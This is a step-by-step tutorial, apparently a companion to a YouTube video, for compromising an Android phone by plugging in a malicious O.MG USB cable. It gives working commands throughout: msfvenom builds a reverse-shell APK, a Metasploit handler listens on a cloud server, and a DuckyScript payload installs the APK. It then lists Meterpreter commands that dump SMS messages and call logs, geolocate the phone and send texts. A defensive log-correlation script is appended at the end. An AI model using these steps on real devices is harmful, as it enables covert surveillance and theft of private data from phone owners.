Generate APK to put on O.MG Cable

Disclaimer

This document DOES NOT promote or encourage any illegal activities! The content in this document is provided solely for educational purposes and to create awareness!

Watch YouTube Video

This document is a companion to my YouTube video:
• https://youtu.be/Qb8Wvo9u5zE

Requirements

1. A Directional O.MG Cable (USB-C to USB-C Cable).
   [Figure: O.MG USB-C to USB-C cable; the active end with USB deploys the payload.]
2. A Linode account.
3. An Android Phone.

1. Generate APK to download using O.MG Cable

• Create your own virtual machine on Linode with a 60-day $100 credit: https://davidbombal.wiki/linode
• If that link doesn't work for you, try this link: https://www.linode.com/lp/youtubeviewers/?ifso=davidbombal
• Please note: Credits expire in 60 days. Big thanks to Linode for sponsoring my videos!

   1. Log in to Linode.
   2. Click on Create Linode.
   3. Choose distribution Ubuntu 21.10 and your Region of choice.
   4. You can use a Shared CPU – Nanode 1 GB is good enough for this demo.
   5. Set the Linode Label to something that makes sense to you, and choose a password.
   6. Click on Create Linode.
   7. SSH into your Linode machine using your credentials.
   8. Enter yes when asked if you are sure you want to continue connecting.
   9. Enter your password for your Linode machine.
   10. You are now ready to use your Ubuntu machine on Linode.
   11. Enter the following command to download the Metasploit framework:

       curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \
         chmod 755 msfinstall && \
         ./msfinstall

       Documentation with detailed instructions: https://docs.metasploit.com/docs/using-metasploit/getting-started/nightly-installers.html

   12. Metasploit Framework is now installed in the /opt/metasploit-framework/bin/ directory.
   13. Run the following commands:

       cd /opt/metasploit-framework/bin
       sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<linode_ip> LPORT=4444 -o /data/omg.apk

   14. Run the following commands:

       msfconsole
       msf6 > use exploit/multi/handler
       msf6 exploit(multi/handler) > set payload android/meterpreter_reverse_tcp
       msf6 exploit(multi/handler) > set lport 4444
       msf6 exploit(multi/handler) > set lhost eth0
       msf6 exploit(multi/handler) > run

   15. Open a new terminal. SSH into the Linode Ubuntu machine, and run the following command:

       python3 -m http.server 8000

2. Load O.MG Cable Payload

O.MG Specific Steps

   1. Make sure your O.MG Cable is plugged into a device. Connect to the O.MG Cable WiFi.
   2. In your browser open http://192.168.4.1
   3. Get the payload for your Android version from one of the following pages:
      • Android 10 and 11: https://github.com/hak5/omgpayloads/tree/master/payloads/library/mobile/android/meterpreter
      • Android 9 (Samsung Galaxy S8+ - with only Chrome browser): https://github.com/davidbombal/hak5/blob/main/omg_android9SGS8_meterpreter
      • Android 12 (Samsung Galaxy S22 Ultra – using Chrome browser as default): https://github.com/davidbombal/hak5/blob/0cbefc353e61cee8d7519d2ab986fad96bcd7aba/omg_androidS22Ultra.txt
   4. Copy the payload into the DuckyPayload area.
      You may need to edit the script to work for different vendor-specific versions of Android.
   5. Update the IP Address and port number to that of your Kali / Cloud server.
   6. Put the O.MG Cable payload side in the Android phone's USB-C port.
   7. In the browser with the DuckyScript Payload Area open, click RUN.

3. Once Reverse Shell is Established -> Meterpreter

   1. Once the reverse shell has been established you will see meterpreter > on your screen.
   2. You can use the following commands on the Android device:
      • pwd – Prints the current working directory on the phone.
      • ifconfig – Shows all the network interfaces on the phone.
      • ps – Shows the current processes that the Android operating system is running.
      • sysinfo – Shows basic information about the Android device.
      • send_sms -d "<phone_number>" -t "<text_content>"
      • geolocate – You can get the GPS coordinates for the Android phone.
      • dump_sms – Extracts all SMS messages and saves them as a text file.
      • dump_calllog – Get call log.
      • upload – Allows you to upload a file to the Android device remotely.
      • download – Allows you to download files from the Android device remotely.
      • wlan_geolocate – Get current lat-long using WLAN information.
      • getuid – Running getuid will display the user that the Meterpreter server is running as on the host.

Requires that the Android phone has a SIM card from a service provider.

Optional Extras (MSFVenom – Payload Explanation)

MSFVenom payload breakdown

    sudo msfvenom -p android/meterpreter_reverse_tcp LHOST=<ip_address> LPORT=4444 -o /data/omg.apk

• -p is for the payload which you'll use. In this case android/meterpreter_reverse_tcp
• LHOST is for the localhost or server IP which will receive the back connection.
• LPORT is for the localhost or server port which listens for the connection from the victim.
• -o is for out, where you save the payload.

Sign APK – Additional Steps (Unnecessary)

• Update Linux instance by running the following commands:

    sudo apt update
    sudo apt install openjdk-17-jdk

• Sign APK – Run the following commands:

    sudo keytool -genkey -v -keystore key.keystore -alias hacked -keyalg RSA -keysize 2048 -validity 10000
    sudo jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore key.keystore omg.apk hacked

• Install Zipalign:

    sudo apt install zipalign

• Verify the .apk by using zipalign:

    sudo zipalign -v 4 omg.apk signed_omg.apk

Get more information

1. Website: https://www.youtube.com/davidbombal
2. Website: https://hak5.org/
3. Website: https://github.com/hak5/omgpayloads/tree/master/payloads/library/mobile/android/meterpreter
4. Website: https://www.offensive-security.com/metasploit-unleashed/meterpreter-basics/

We would like to acknowledge the following people:
• int0x80
• @_MG_
• Drewsec (https://www.youtube.com/channel/UCBWVaokY_7yCpVn-X0Ny9aA/)
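
From the defender's side, the delivery in section 1 (an .apk served by python3 -m http.server on port 8000, then a reverse TCP session to port 4444 on the same server) leaves a recognisable pair of network events. The correlation below is an added example, not part of the original document; the log format, the IP addresses and the function name find_sideload_callbacks are constructed for illustration.

```python
import re
from datetime import datetime, timedelta

# Constructed sample records (hypothetical format, documentation IP ranges):
# "http" lines come from a web proxy, "tcp" lines from a flow log.
SAMPLE_LOG = """\
2024-05-01T10:00:03Z http 10.0.5.23 203.0.113.7:8000 GET /omg.apk 200 server="SimpleHTTP/0.6 Python/3.9.7"
2024-05-01T10:00:41Z tcp 10.0.5.23 203.0.113.7:4444 established
2024-05-01T10:02:10Z http 10.0.5.40 198.51.100.9:443 GET /store/app.apk 200 server="nginx"
2024-05-01T10:02:30Z tcp 10.0.5.40 198.51.100.9:443 established
2024-05-01T10:05:00Z http 10.0.5.61 203.0.113.7:8000 GET /omg.apk 200 server="SimpleHTTP/0.6 Python/3.9.7"
2024-05-01T11:30:00Z tcp 10.0.5.61 203.0.113.7:4444 established
"""

# Only bare IPv4 destinations match; fetches from named hosts are skipped.
LINE = re.compile(
    r'(?P<ts>\S+) (?P<kind>http|tcp) (?P<src>\S+) (?P<dst>[\d.]+):(?P<port>\d+)'
    r'(?: GET (?P<path>\S+) \d+ server="(?P<server>[^"]*)")?')


def find_sideload_callbacks(log_text, window=timedelta(minutes=15)):
    """Return (client, server_ip, apk_path, callback_port) for each device that
    fetched an .apk from a Python http.server and then opened a TCP session to
    the same IP on a different port within `window`."""
    downloads, hits = [], []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ")
        port = int(m["port"])
        if m["kind"] == "http":
            # python3 -m http.server identifies itself as "SimpleHTTP/<ver>"
            if m["path"] and m["path"].lower().endswith(".apk") \
                    and m["server"].startswith("SimpleHTTP/"):
                downloads.append((ts, m["src"], m["dst"], port, m["path"]))
            continue
        for d_ts, client, server, d_port, path in downloads:
            same_pair = (client, server) == (m["src"], m["dst"])
            if same_pair and port != d_port and timedelta(0) <= ts - d_ts <= window:
                hits.append((client, server, path, port))
    return hits


if __name__ == "__main__":
    for hit in find_sideload_callbacks(SAMPLE_LOG):
        print("APK download followed by callback:", hit)
```

The third device in the sample calls back 85 minutes after the download, so it is only reported when the window is widened; pick the window to match how long users typically take to open a sideloaded app.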